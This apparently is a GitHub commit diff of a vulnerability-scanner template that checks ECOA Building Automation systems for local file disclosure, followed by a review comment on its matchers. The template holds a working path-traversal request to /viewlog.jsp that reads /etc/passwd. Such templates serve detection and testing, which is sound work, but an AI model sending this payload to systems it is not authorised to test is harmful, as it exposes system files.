Update ecoa-building-automation-lfd.yaml

patch-1
Roberto Nunes 2021-09-15 07:24:11 +09:00 committed by GitHub
parent 01eb1cf559
commit 428be9721b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 17 deletions


@ -1,30 +1,21 @@
id: ecoa-building-automation-lfd
info:
name: ECOA Building Automation System Local File Disclosure
info:
author: 0x_Akoko
name: "ECOA Building Automation System Local File Disclosure"
reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php"
severity: high
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
tags: ecoa,lfi
tags: "ecoa,lfi"
requests:
- raw:
- |
POST /viewlog.jsp HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers-condition: and
yr=2021&mh=6&fname=../../../../../../../../etc/passwd
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
- "root:.*:0:0:"
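Review bot: The regex `"root:.*:0:0:"` on the last line looks like the only matcher left on the new side; the `+`/`-` markers are lost in this rendering, so this is inferred from the line order and the 17 deletions. If the `status` matcher and `matchers-condition: and` were indeed removed, the template reports a finding on any response that contains such a string, including an error page or a reflected parameter, which raises the false-positive rate for a `severity: high` check. I would keep `matchers-condition: and` with the `- type: status` / `- 200` matcher. I would also narrow the pattern to `- "root:[^:]*:0:0:"` so the password field cannot run across other colon-separated fields. A short comment above the matchers saying that a passwd-style root entry in a 200 response is the disclosure indicator would help whoever triages the results.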